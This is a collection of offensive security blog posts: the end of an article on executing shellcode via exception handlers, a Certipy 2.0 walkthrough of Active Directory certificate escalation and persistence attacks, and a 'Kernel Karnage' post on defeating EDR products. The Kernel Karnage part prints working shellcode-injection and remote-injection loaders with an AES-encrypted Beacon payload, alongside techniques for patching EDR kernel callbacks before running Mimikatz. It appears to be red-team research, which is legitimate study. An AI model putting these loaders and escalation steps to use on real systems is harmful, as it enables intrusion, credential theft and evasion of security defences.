  4. The application will finish preparing by finding any instance of an int3 instruction (a single 0xCC byte). This instruction will be stored for use by the signal handler and is returned to the caller which will invoke the arbitrary shellcode.

Once the necessary memory locations have been found, the caller can invoke the arbitrary shellcode by executing the int3 instruction that was returned to them.

  1. Once the caller has invoked the int3 instruction, the signal handler will be called. The signal handler should determine if this exception is for executing arbitrary shellcode by comparing the fault address - 1 with the previously stored location of the int3 instruction. One must be subtracted from the fault address because in the SIGTRAP signal handler, the fault address points to the instruction pointer whereas we need the instruction that caused the exception.
  2. If the breakpoint is indeed for the arbitrary shellcode, then the signal handler should:
    1. Retrieve the list of legitimate instructions needed to simulate the arbitrary shellcode.
    2. Store these instructions in thread-local storage.
    3. Set the instruction pointer to the first legitimate instruction to execute.
    4. Set the Trap flag on the FLAGS register.
    5. Continue execution.
  3. The rest of the instructions will call the signal handler, however, unlike Vectored Exception handlers, there is no error code passed differentiating a breakpoint and a single step exception. The signal handler can determine if the exception is for a legitimate instruction being executed by checking its thread-local storage for the previously set context. In these cases, the signal handler should:
    1. Retrieve the list of legitimate instructions to execute from the thread-local storage.
    2. Set the instruction pointer to the next legitimate instruction's memory location.
    3. If this instruction is not the last instruction to execute, set the Trap flag on the FLAGS register. Otherwise, do not set the Trap flag.
    4. Continue execution.

Assuming the shellcode ends with a return instruction, eventually the execution flow will be gracefully returned to the caller.
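
For illustration, the core of such a signal handler could look like this on x86_64 (a minimal sketch; g_instructions, g_count, and g_index are hypothetical globals from the preparation stage, and the breakpoint/single-step disambiguation via thread-local storage is omitted):

#include <signal.h>
#include <stdint.h>
#include <sys/ucontext.h>

extern uint64_t g_instructions[]; // legitimate instruction addresses
extern size_t   g_count;
extern size_t   g_index;

static void trap_handler(int sig, siginfo_t *info, void *uap)
{
    ucontext_t *ctx = (ucontext_t *)uap;

    // Redirect execution to the next legitimate instruction.
    ctx->uc_mcontext->__ss.__rip = g_instructions[g_index++];

    // Keep single-stepping until the last instruction has been dispatched.
    if (g_index < g_count)
        ctx->uc_mcontext->__ss.__rflags |= 0x100; // set the Trap Flag
}

static void register_trap_handler(void)
{
    struct sigaction sa = { 0 };
    sa.sa_sigaction = trap_handler;
    sa.sa_flags = SA_SIGINFO;
    sigaction(SIGTRAP, &sa, NULL);
}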

Exception Oriented Programming highlights a fundamental design flaw with the JIT restrictions present in the Hardened Runtime. The JIT mitigation assumes that to execute code "just-in-time", an attacker must have access to a WX page. In reality, an attacker can abuse a large amount of the instructions already present in legitimate modules to execute their own malicious shellcode.

Proof of Concept

Both the Windows and macOS proof-of-concept utilities can be accessed at this repository.

Conclusion

As seen with the new methodology in this article, code execution can be achieved without the need of dedicated memory for that code. When considering future research into runtime code execution, it is more effective to look at execution from a high-level perspective, an objective of executing the operations in a piece of code, instead of focusing on the requirements of existing methodology.

In part 2 of this series, we will explore how Exception Oriented Programming expands the possibilities for buffer overflow exploitation on Windows. We'll explore how to evade Microsoft's ROP mitigations such as security cookies and SafeSEH for gaining code execution from common vulnerabilities. Make sure to follow my Twitter to be amongst the first to know when this article has been published!

Parallel Discovery

Recently, another researcher (@x86matthew) published an article describing a similar idea to Exception Oriented Programming, implemented using vectored exception handlers for x86.

Whenever my research leads me to some new methodology I consider innovative, one practice I take is to publish a SHA256 hash of the idea, such that in the future, I can prove that I discovered a certain idea at a certain point in time. Fortunately, I followed this practice for Exception Oriented Programming.

On February 3rd, 2021, I created a public gist of the following SHA256 hash:

5169c2b0b13a9b713b3d388e61eb007672e2377afd53720a61231491a4b627f7

To prove that this hash is a representation of a message summarizing Exception Oriented Programming, here is the message you can take a SHA256 hash of and compare to the published one above.

Instead of allocating executable memory to execute shellcode, split the shellcode into individual instructions, find modules in memory that have the instruction bytes in an executable section, then single step over those instructions (changing the RIP to the next instruction and so on).

Since the core idea was published by Matthew, I wanted to share my additional research in this article around stealthier SEH exception handlers and how the impact is not only limited to Windows. In a future article, I plan on sharing my additional research on how this methodology can be applied on previously unexploitable buffer overflow vulnerabilities on Windows.

Object Overloading

15 February 2022 at 20:01
In this post we are going to look at one such technique that I thought was cool while playing around with the Windows Object Manager, and which should allow us to load an arbitrary DLL of our creation into a Windows process during initial execution, something that I've been calling "Object Overloading" for reasons which will hopefully become apparent in this post.

H1.Jack, The Game

15 February 2022 at 23:00

As crazy as it sounds, we’re releasing a casual free-to-play mobile auto-battler for Android and iOS. We’re not changing line of business - just having fun with computers!

We believe that the greatest learning lessons come from outside your comfort zone, so whether it is a security audit or a new side hustle we’re always challenging ourselves to improve the craft.

During the fall of 2019, we embarked on a pretty ambitious goal despite having virtually zero experience in game design. We partnered with a small game studio that was just getting started and decided to combine forces to design and develop a casual mobile game set in the *cyber* space. After many prototypes and changes of direction, we spent a good portion of our spare time in 2020 working on the core mechanics and graphics. Unfortunately, the limited time and budget further delayed beta testing and the final release. Making a game is no joke, especially when it is a combined side project for two thriving businesses.

Despite all, we’re happy to announce the release of H1.Jack for Android and iOS as a free-to-play with no advertisement. We hope you’ll enjoy the game in between your commutes and lunch breaks!

No malware included.

H1.Jack is a casual mobile auto-battler inspired by cyber security events. Start from the very bottom and spend your money and fame in gaining new techniques and exploits. Heartbleed or Shellshock won’t be enough!

H1jack Room

While playing, you might end up talking to John or Luca.

Luca&John H1jack

Our monsters are procedurally generated, meaning there will be tons of unique systems, apps, malware and bots to hack. Battle levels are also dynamically generated. If you want a sneak peek, check out the trailer:

Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more!

19 February 2022 at 13:09

As the title states, the latest release of Certipy contains many new features, techniques and improvements. This blog post dives into the technical details of many of them.

Public Key Infrastructure can be difficult to set up. Users and administrators are often not fully aware of the implications of ticking a single checkbox — especially when that single checkbox is what (finally) made things work.

It’s been almost five months since the first release of Certipy. Back then, Certipy was just a small tool for abusing and enumerating Active Directory Certificate Services (AD CS) misconfigurations. Since then, our offensive team at Institut For Cyber Risk have come across many different AD CS environments during our engagements, which required new additions and features.

These have been implemented and Certipy 2.0 is now ready for public release.

BloodHound integration

One of the major new features of Certipy is BloodHound integration. The old version had a simple feature to find vulnerable certificate templates based on the current user’s group memberships. But as we’ll see in a bit, integrating with BloodHound is just better.

By default, the new version of Certipy will output the enumeration results as BloodHound data as well as in text and JSON format. I’ve often found myself running the tool multiple times because I wanted to view the output in a different format.

It is however possible to output only BloodHound data, JSON, or text by specifying one or more of the switches -bloodhound, -json, or -text, respectively.
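
An illustrative invocation (the credentials and host are placeholders, and the exact target syntax is an assumption):

certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound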

The BloodHound data is saved as a ZIP-file that can be imported into the latest version of BloodHound (4.1.0 at the time of writing). Please note that Certipy uses BloodHound’s new format, introduced in version 4.

New edges and nodes means new queries. I have created the most important queries that Certipy supports. The queries can be found in the repository and imported into your own BloodHound setup.

Certipy’s BloodHound queries

The new version of Certipy can abuse all of the scenarios listed in the “Domain Escalation” category. Suppose we have taken over the domain user account JOHN. Let’s start with one of the first queries, “Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC1)”.

Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC1)

This is a fairly simple path. But as we go through the escalation queries, we might see why BloodHound is just better, as attack paths can be built using the imported Certipy data.

Shortest Paths to Vulnerable Certificate Template Access Control from Owned Principals (ESC4)

New Escalation Techniques

The whitepaper “Certified Pre-Owned” lists 8 domain escalation techniques for misconfigurations in AD CS (ESC1-ESC8). Previously, only ESC1 and ESC6 were supported by Certipy, and ESC8 was supported by Impacket’s ntlmrelayx. While ESC1 and ESC8 are the vulnerabilities we’ve seen the most, we’ve also come across other misconfigurations, which is why I have implemented all of them, except for ESC5 which is too abstract.

As such, Certipy now supports abusing all of the escalation techniques listed in the queries.

ESC1 — Misconfigured Certificate Templates

Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC1)

The most common misconfiguration we’ve seen during our engagements is ESC1. In essence, ESC1 is when a certificate template permits Client Authentication and allows the enrollee to supply an arbitrary Subject Alternative Name (SAN).

The previous release of Certipy had support for this technique as well, but the new version comes with improvements, and therefore, I will demonstrate all of the escalation techniques that the new version of Certipy supports.

For ESC1, we can just request a certificate based on the vulnerable certificate template and specify an arbitrary SAN with the -alt parameter.
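
For illustration, such a request could look like the following (an illustrative invocation: the credentials, host names, CA name, and template name are placeholders, and the exact target syntax may differ between Certipy versions):

certipy req 'corp.local/john:Passw0rd@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local'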

A new feature of Certipy is that certificates and private keys are now stored in PKCS#12 format. This allows us to pack the certificate and private key together in a standardized format.

Another neat feature is that the auth command will try to retrieve the domain and username from the certificate for authentication.

In most cases, this will not work, usually because the domain name cannot be resolved. To work around this, all the necessary parameters can be specified on the command line if needed.

ESC2 — Misconfigured Certificate Templates

Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC2)

ESC2 is when a certificate template can be used for any purpose. The whitepaper “Certified Pre-Owned” does not mention any specific domain escalation technique that works out of the box for ESC2. But since the certificate can be used for any purpose, it can be used for the same technique as with ESC3, which we’ll see below.

ESC3 — Misconfigured Enrollment Agent Templates

Shortest Paths to Enrollment Agent Templates from Owned Principals (ESC3)

ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users. As we can see in the path above, the ESC2 certificate template is vulnerable to ESC3 as well, since the ESC2 template can be used for any purpose.

First, let’s request a certificate based on ESC3.

With our new Certificate Request Agent certificate we can request certificates on behalf of other users by specifying the -on-behalf-of parameter along with our Certificate Request Agent certificate. The -on-behalf-of parameter value must be in the form of domain\user, and not the FQDN of the domain, i.e. corp rather than corp.local.
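
An illustrative invocation (all account, host, and template names are placeholders, and the -pfx parameter for supplying the agent certificate is an assumption):

certipy req 'corp.local/john:Passw0rd@ca.corp.local' -ca 'corp-CA' -template 'ESC3' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'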

For good measure, here’s the same attack with the ESC2 certificate template.

ESC4 — Vulnerable Certificate Template Access Control

Shortest Paths to Vulnerable Certificate Template Access Control from Owned Principals (ESC4)

ESC4 is when a user has write privileges over a certificate template. This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1.

As we can see in the path above, only JOHNPC has these privileges, but our user JOHN has the new AddKeyCredentialLink edge to JOHNPC. Since this technique is related to certificates, I have implemented this attack as well, which is known as Shadow Credentials. Here’s a little sneak peek of Certipy’s shadow auto command to retrieve the NT hash of the victim.

We’ll go into more details about the technique later in this post, but for now, we just want the NT hash of JOHNPC.

The new version of Certipy can overwrite the configuration of a certificate template with a single command. By default, Certipy will overwrite the configuration to make it vulnerable to ESC1. We can also specify the -save-old parameter to save the old configuration, which will be useful for restoring the configuration after our attack. Be sure to do this, if using Certipy outside a test environment.

As we can see below, the new configuration will allow Authenticated Users full control over the certificate template. Moreover, the new template can be used for any purpose, and the enrollee supplies the SAN, meaning it’s vulnerable to ESC1.

When we’ve overwritten the configuration, we can simply request a certificate based on the ESC4 template as we would do with ESC1.

If we want to restore the configuration afterwards, we can just specify the path to the saved configuration with the -configuration parameter. You can also use this parameter to set custom configurations.
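
Sketched as commands, the overwrite-and-restore flow could look like this (illustrative throughout: accounts, hosts, and file names are placeholders, and the template sub-command and target syntax are assumptions):

certipy template 'corp.local/john:Passw0rd@dc.corp.local' -template 'ESC4' -save-old
# ... request a certificate based on the ESC4 template, as with ESC1 ...
certipy template 'corp.local/john:Passw0rd@dc.corp.local' -template 'ESC4' -configuration 'ESC4.json'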

ESC5 — Vulnerable PKI Object Access Control

ESC5 is when objects outside of certificate templates and the certificate authority itself can have a security impact on the entire AD CS system, for instance the CA server’s AD computer object or the CA server’s RPC/DCOM server. This escalation technique has not been implemented in Certipy, because it’s too abstract. However, if the CA server is compromised, you can perform the ESC7 escalation.

ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2

Find Certificate Authorities with User Specified SAN (ESC6)

ESC6 is when the CA specifies the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. In essence, this flag allows the enrollee to specify an arbitrary SAN on all certificates despite a certificate template’s configuration. In Certipy, this can be seen in the property “User Specified SAN” of the CA. If this property is not shown, it means that Certipy couldn’t get the security and configuration of the CA.

The attack is the same as ESC1, except that we can choose any certificate template that permits client authentication.

ESC7 — Vulnerable Certificate Authority Access Control

Shortest Paths to Vulnerable Certificate Authority Access Control from Owned Principals (ESC7)

ESC7 is when a user has the Manage CA or Manage Certificates access right on a CA. While there are no public techniques that can abuse only the Manage Certificates access right for domain privilege escalation, we can still use it to issue or deny pending certificate requests.

We’ve seen this misconfiguration on one of our engagements. The whitepaper mentions that this access right can be used to enable the EDITF_ATTRIBUTESUBJECTALTNAME2 flag to perform the ESC6 attack, but this will not have any effect until the CA service (CertSvc) is restarted. When a user has the Manage CA access right, the user is allowed to restart the service. However, it does not mean that the user can restart the service remotely and we were also not allowed to restart this service on our engagement.

In the following, I will explain a new technique I found that doesn’t require any service restarts or configuration changes.

In order for this technique to work, the user must also have the Manage Certificates access right, and the certificate template SubCA must be enabled. Fortunately, with our Manage CA access right, we can fulfill these prerequisites if needed.

If we don’t have the Manage Certificates access right, we can just add ourselves as a new “officer”. An officer is just the term for a user with the Manage Certificates access right, as per MS-CSRA 3.1.1.7.

After running a new Certipy enumeration with the find command, and importing the output into BloodHound, we should now see that JOHN has the Manage Certificates and Manage CA access right.

Shortest Paths to Vulnerable Certificate Authority Access Control from Owned Principals (ESC7)

The next requirement is that the default certificate template SubCA is enabled. We can list the enabled certificate templates on a CA with the -list-templates parameter, and in this case, the SubCA template is not enabled on our CA.

With our Manage CA access right, we can just enable the SubCA certificate template with the -enable-template parameter.

The SubCA certificate template is now enabled, and we’re ready to proceed with the new attack.

The SubCA certificate template is enabled by default, and it’s a built-in certificate template, which means that it cannot be deleted in the Certificate Templates Console (MMC).

The SubCA certificate template is interesting because it is vulnerable to ESC1 (Enrollee Supplies Subject and Client Authentication).

However, only DOMAIN ADMINS and ENTERPRISE ADMINS are allowed to enroll in the SubCA certificate template.

Show Enrollment Rights for Certificate Template

But if a user has the Manage CA access right and the Manage Certificates access right, the user can effectively issue failed certificate requests.

Let’s try to request a certificate based on the SubCA certificate template, where we specify the SAN [email protected].

We get a CERTSRV_E_TEMPLATE_DENIED error, meaning that we are not allowed to enroll in the template. Certipy will ask if we still want to save the private key for our request, and in this case, we answer “y” (for yes). Certipy also prints out the request ID, which we’ll use for issuing the certificate.

With our Manage CA and Manage Certificates access right, we can issue the failed certificate request with the ca command by specifying the request ID in -issue-request parameter.

When we’ve issued the certificate, we can now retrieve it with the req command by specifying the -retrieve parameter with our request ID.
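
Sketched as commands (illustrative: the request ID 785, credentials, and target syntax are placeholders and assumptions):

certipy req 'corp.local/john:Passw0rd@ca.corp.local' -ca 'corp-CA' -template 'SubCA' -alt 'administrator@corp.local'
certipy ca 'corp.local/john:Passw0rd@ca.corp.local' -ca 'corp-CA' -issue-request 785
certipy req 'corp.local/john:Passw0rd@ca.corp.local' -ca 'corp-CA' -retrieve 785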

It is now possible to use the certificate to obtain the password hash of the administrator account.

ESC8 — NTLM Relay to AD CS HTTP Endpoints

Find Certificate Authorities with HTTP Web Enrollment (ESC8)

ESC8 is when an Enrollment Service has installed and enabled HTTP Web Enrollment. This attack is already implemented in Impacket’s ntlmrelayx, but I thought there was room for improvements and new features.

In Certipy, this vulnerability can be seen in the property “Web Enrollment” of the CA.

To start the relay server, we just run the relay command and specify the CA’s IP.

By default, Certipy will request a certificate based on the Machine or User template depending on whether the relayed account name ends with $. It is possible to specify another template with the -template parameter.
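
An illustrative invocation (the CA's IP address and the template name are placeholders; the -ca parameter name for passing the CA's IP is an assumption):

certipy relay -ca 10.0.0.10 -template 'Machine'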

We can then use a technique such as PetitPotam to coerce authentication from a computer. In this example, I simply made a dir \\IP\foo\bar from an administrator command prompt.

Certipy will relay the NTLM authentication to the Web Enrollment interface of the CA and request a certificate for the user.

Now, let’s consider a scenario where all certificate requests must be approved by an officer, and we have the Manage Certificates access right.

In this scenario, Certipy will ask if we want to save the private key for our request. In this case, we answer yes.

With our Manage Certificates access right, we can issue the request based on the request ID.

We then start the relaying server again, but this time, we specify -retrieve with our request ID.

Certipy will retrieve the certificate based on the request ID rather than requesting a new one. This is an edge case, but I thought it was interesting to implement nonetheless.

Shadow Credentials

One of the new edges in BloodHound 4.1.0 is AddKeyCredentialLink.

Path from JOHN to JOHNPC

The attack has been dubbed Shadow Credentials, and it can be used for account takeover. As mentioned earlier, this technique is related to certificates, and therefore, I have implemented the attack in Certipy. We can also abuse this technique when we have a “Generic Write” privilege over another user and we don’t want to reset their password.

Auto

The command you’ll likely use the most is auto, which we saw earlier. In essence, Certipy will create and add a new Key Credential, authenticate with the certificate, and then restore the old Key Credential attribute of the account. This is useful if you just want the NT hash of the victim account, like in the previous ESC4 scenario.
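
An illustrative invocation (the account and target values are placeholders, and the -account parameter name is an assumption):

certipy shadow auto 'corp.local/john:Passw0rd@dc.corp.local' -account 'johnpc'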

Add

If you want to add a Key Credential manually for persistence, you can use the add action. This will add a new Key Credential and save the certificate and private key, which can be used later with Certipy’s auth command.

List

It is also possible to list the current Key Credentials of an account. This is useful for deleting or getting detailed information about a specific Key Credential.

Info

Information about a Key Credential can be retrieved with the info action, where the Key Credential can be specified with the -device-id.

Remove

To remove a Key Credential, you can use the remove action and specify the Key Credential in the -device-id parameter.

Clear

Alternatively, you can just clear all of the Key Credentials for the account if desired.

Golden Certificates

Another new major feature of Certipy is the ability to create “Golden Certificates”. This is a technique for domain persistence after compromising the CA server or domain. It’s an alternative to “Golden Tickets”, but instead of forging tickets, you can forge certificates that can be used for Kerberos authentication.

Backup

The first step is to get the certificate and private key of the CA. Suppose we have compromised the domain administrator administrator and we want to retrieve the certificate and private key of the CA. This can be done in the Certification Authority Console on the CA server, but I have implemented this in Certipy as well.

In essence, Certipy will create a new service on the CA server which will backup the certificate and private key to a predefined location. The certificate and private key will then be retrieved via SMB, and finally the service and files are removed from the server.

Forging

With the CA certificate and private key, we can use Certipy’s new forge command to create certificates for arbitrary users. In this case, we create a certificate for JOHN. The subject doesn’t matter in this case, just the SAN.
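
An illustrative invocation (the -ca-pfx and -subject parameter names are assumptions, and all values are placeholders):

certipy forge -ca-pfx 'corp-CA.pfx' -subject 'CN=John' -alt 'john@corp.local'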

We can then use the certificate to authenticate as JOHN.

It also works for the domain controller DC$.

It does not, however, work for disabled accounts, such as the krbtgt account.

Other Improvements

The latest release of Certipy also contains a few minor improvements and adjustments.

Certificate Authority Management

We saw earlier how we could enable a certificate template. If we want to cleanup after ourselves, we can disable the template, as shown below.

We can also remove JOHN as an officer, but we’ll still have our Manage CA access rights.

As we can see below, if we try to perform the ESC7 attack now, we get an “access denied” when trying to issue the certificate.

JOHN can also add another manager, for instance JANE.

JANE can then add a third manager, EVE.

JANE can even remove herself as a manager.

But then she won’t be able to remove EVE as a manager.

Dynamic Endpoints

This is a minor, but important new feature. During one of our engagements, SMB was firewalled off on the CA server. The previous release of Certipy requested certificates via the named pipe cert, and when SMB was firewalled off, then the old version was not able to request certificates.

However, the CA service actually listens on a dynamic TCP endpoint as well. The new version of Certipy will try to connect to the dynamic TCP endpoint, if SMB fails.

Alternatively, you can specify the -dynamic-endpoint parameter to prefer the dynamic TCP endpoint over SMB. This is useful if you don’t want to wait for the timeout for each request when SMB is firewalled off.

For slower connections, such as through a proxy, it’s also possible to specify a longer timeout than the default 5 seconds for almost all types of commands with the -timeout parameter.

The new version of Certipy has many more improvements and parameters than I’ve shown in this blog post. I recommend that you explore the new features and parameters of Certipy if you find yourself in an unusual situation. If you have any issues or feature requests, I encourage you to submit them on Github. I hope you will enjoy the new version of Certipy.

The new version can be found here: https://github.com/ly4k/Certipy



Kernel Karnage – Part 9 (Finishing Touches)

22 February 2022 at 13:03

It’s time for the season finale. In this post we explore several bypasses but also look at some mistakes made along the way.

1. From zero to hero: a quick recap

As promised in part 8, I spent some time converting the application to disable Driver Signature Enforcement (DSE) into a Beacon Object File (BOF) and adding in some extras, such as string obfuscation to hide very common string patterns like registry keys and constants from network inspection. I also changed some of the parameters to work with user input via CobaltWhispers instead of hardcoded values and replaced some notorious WIN32 API functions with their Windows Native API counterparts.

Once this was done, I started debugging the BOF and testing the full attack chain:

  • starting with the EarlyBird injector being executed as Administrator
  • disabling DSE using the BOF
  • deploying the Interceptor driver to cripple EDR/AV
  • running Mimikatz via Beacon.

The full attack is demonstrated below:

2. A BOF a day, keeps the doctor away

With my internship coming to an end, I decided to focus on Quality of Life updates for the InterceptorCLI as well as convert it into a Beacon Object File (BOF) in addition to the DisableDSE BOF, so that all the components may be executed in memory via Beacon.

The first big improvement is to rework the commands to be more intuitive and convenient. It’s now possible to provide multiple values to a command, making it much easier to patch multiple callbacks. Even if that’s too much manual labour, the -patch module command will take care of all callbacks associated with the provided drivers.

Next, I added support for vendor recognition and vendor based actions. The vendors and their associated driver modules are taken from SadProcessor’s Invoke-EDRCheck.ps1 and expanded by myself with modules I’ve come across during the internship. It’s now possible to automatically detect different EDR modules present on a target system and take action by automatically patching them using the -patch vendor command. An overview of all supported vendors can be obtained using the -list vendors command.

Finally, I converted the InterceptCLI client into a Beacon Object File (BOF), enhanced with direct syscalls and integrated in my CobaltWhispers framework.

3. Bigger fish to fry

With $vendor2 defeated, it’s also time to move on to more advanced testing. Thus far, I’ve only tested against consumer-grade Anti-Virus products and not enterprise EDR/AV platforms. I spent some time setting up and playing with $EDR-vendor1 and $EDR-vendor2.

To my surprise, once I had loaded the Interceptor driver, $EDR-vendor2 would detect that a new driver had been loaded, most likely using ImageLoad callbacks, and refresh its own modules to restore protection and undo any potential tampering. Subsequently, any I/O requests to Interceptor are blocked by $EDR-vendor2, resulting in an "Access denied" message. The current version of InterceptorCLI makes use of various WIN32 API calls, including DeviceIoControl() to contact Interceptor. I suspect $EDR-vendor2 uses a minifilter to inspect and block I/O requests rather than relying on user land hooks, but I’ve yet to confirm this.

Contrary to $EDR-vendor2, I ran into issues getting $EDR-vendor1 to work properly with the $EDR-vendor1 platform and generate alerts, so I moved on to testing against $vendor3 and $EDR-vendor3. My main testing goal is the Interceptor driver itself and its ability to hinder the EDR/AV. The method of delivering and installing the driver is less relevant.

Initially, after patching all the callbacks associated with $vendor3, my EarlyBird-injector-spawned process would crash, resulting in no Beacon callback. The cause of the crash is klflt.sys, which I assume is $vendor3’s filesystem minifilter or at least part of it. I haven’t pinpointed the exact reason of the crash, but I suspect it is related to handle access rights.

When restoring klflt.sys callbacks, EarlyBird is executed and Beacon calls back successfully. However, after a notable delay, Beacon is detected and removed. Apart from detection upon execution, my EarlyBird injector is also flagged when scanned. I’ve used the same compiled version of my injector for several weeks against several different vendors, combined with other monitoring software like ProcessHacker2, so it’s possible samples have been submitted and analyzed by different sandboxes.

In an attempt to get around klflt.sys, I decided to try a different injection approach and stick to my own process.

#include <windows.h>

void main()
{
    const unsigned char shellcode[] = ""; // Beacon shellcode omitted
    PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);
    DWORD threadID;
    HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);
    WaitForSingleObject(hThread, INFINITE);
}

These 6 lines of primitive shellcode injection were successful in bypassing klflt.sys and executing Beacon.

4. Rookie mistakes

When I started my tests against $EDR-vendor3, the first thing that happened wasn’t alarms and sirens going off, it was a good old bluescreen. During my kernel callbacks patching journey, I never considered the possibility of faulty offset calculations. The code responsible for calculating offsets just happily adds up the addresses with the located offset and returns the result without any verification. This had worked fine on my Windows 10 build 19042 test machine, but failed on the $EDR-vendor3 machine which is a Windows 10 build 18362.

// Scan the first 0xff bytes of the function for the "lea r13" opcode
// pattern of the current Windows build.
for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
    if (*(PUCHAR)instructionAddr == OPCODE_LEA_R13_1[g_WindowsIndex] &&
        *(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_R13_2[g_WindowsIndex] &&
        *(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_R13_3[g_WindowsIndex]) {

        // Read the 32-bit displacement and add it to the address of the next
        // instruction (7 bytes past the lea) to obtain the callback array address.
        OffsetAddr = 0;
        memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), 4);
        return OffsetAddr + 7 + instructionAddr;
    }
}

If we look at the kernel base address 0xfffff807'81400000, we can expect the address of the kernel callback arrays to share the same upper 32 bits (0xfffff807).

However, comparing the debug output to the expected address, we can note that the returned address (callback array address) 0xfffff808'81903ba0 differs from the expected return address 0xfffff807'81903ba0 by 0x100000000 (or by 0x100503ba0 when compared to the kernel base address). The upper 32 bits don't match up.

The calculated offset we’re working with in this case is 0xffdab4f7. Following the original code, we add 0xffdab4f7 + 0x7 + 0xfffff80781b586a2, which yields the callback array address. This is where the issue resides. OffsetAddr is a ULONG64, in other words an "unsigned long long", which comes down to 0x00000000'00000000 when initialized to 0. When the memcpy() call copies over the offset bytes, the result becomes 0x00000000'ffdab4f7, so the negative 32-bit offset is never sign-extended. To quickly solve this problem, I changed OffsetAddr to a LONG and added a function to verify the address calculation against the kernel base address.
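
To make the sign-extension issue concrete, here is the arithmetic with the values from above (the corrected VerifyOffsets routine follows below):

ULONG64 instructionAddr = 0xfffff80781b586a2;
ULONG64 offsetU = 0x00000000ffdab4f7; // zero-extended ULONG64
LONG    offsetS = (LONG)0xffdab4f7;   // sign-extended, i.e. -0x254b09

// instructionAddr + 7 + offsetU == 0xfffff808'81903ba0 (wrong, off by 0x100000000)
// instructionAddr + 7 + offsetS == 0xfffff807'81903ba0 (correct)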

ULONG64 VerifyOffsets(LONG OffsetAddr, ULONG64 InstructionAddr) {
	ULONG64 ReturnAddr = OffsetAddr + 7 + InstructionAddr;
	ULONG64 KernelBaseAddr = GetKernelBaseAddress();
	if (KernelBaseAddr != 0) {
		if (ReturnAddr - KernelBaseAddr > 0x1000000) {
			KdPrint((DRIVER_PREFIX "Mismatch between kernel base address and expected return address: %llx\n", ReturnAddr - KernelBaseAddr));
			return 0;
		}
		return ReturnAddr;
	}
	else {
		KdPrint((DRIVER_PREFIX "Unable to get kernel base address\n"));
		return 0;
	}
}

5. Final round

As expected, $EDR-vendor3 is a big step up from the regular consumer-grade anti-virus products I’ve tested against thus far, and the loader I’ve been using during this series doesn’t cut it anymore. Right around the time I started my tests, I came across a tweet from @an0n_r0 discussing a semi-successful $EDR-vendor3 bypass, so I used this as the base for my new stage 0 loader.

The loader is based on the simple remote code injection pattern using the VirtualAllocEx, WriteProcessMemory, VirtualProtectEx and CreateRemoteThread WIN32 APIs.

void* exec = fpVirtualAllocEx(hProcess, NULL, blenu, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

fpWriteProcessMemory(hProcess, exec, bufarr, blenu, NULL);

DWORD oldProtect;
fpVirtualProtectEx(hProcess, exec, blenu, PAGE_EXECUTE_READ, &oldProtect);

fpCreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)exec, exec, 0, NULL);

I also incorporated dynamic function imports using hashed function names, as well as Code Integrity Guard (CIG) to protect the spawned suspended process against injection of non-Microsoft-signed binaries.

HANDLE SpawnProc() {
    STARTUPINFOEXA si = { 0 };
    PROCESS_INFORMATION pi = { 0 };
    SIZE_T attributeSize;

    InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attributeSize);

    DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);

    si.StartupInfo.cb = sizeof(si);
    si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT;

    if (!CreateProcessA(NULL, (LPSTR)"C:\\Windows\\System32\\svchost.exe", NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi)) {
        std::cout << "Could not spawn process" << std::endl;
        DeleteProcThreadAttributeList(si.lpAttributeList);
        return INVALID_HANDLE_VALUE;
    }

    DeleteProcThreadAttributeList(si.lpAttributeList);
    return pi.hProcess;
}

The Beacon payload is stored as an AES256 encrypted PE resource and decrypted in memory before being injected into the remote process.

HRSRC rc = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD_BIN1), L"PAYLOAD_BIN");
DWORD rcSize = fpSizeofResource(NULL, rc);
HGLOBAL rcData = fpLoadResource(NULL, rc);

char* key = (char*)"16-byte-key-here";
const uint8_t iv[] = { 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f };

int blenu = rcSize;
int klen = strlen(key);

int klenu = klen;
if (klen % 16)
    klenu += 16 - (klen % 16);

uint8_t* keyarr = new uint8_t[klenu];
ZeroMemory(keyarr, klenu);
memcpy(keyarr, key, klen);

uint8_t* bufarr = new uint8_t[blenu];
ZeroMemory(bufarr, blenu);
memcpy(bufarr, rcData, blenu);

pkcs7_padding_pad_buffer(keyarr, klen, klenu, 16);

AES_ctx ctx;
AES_init_ctx_iv(&ctx, keyarr, iv);
AES_CBC_decrypt_buffer(&ctx, bufarr, blenu);

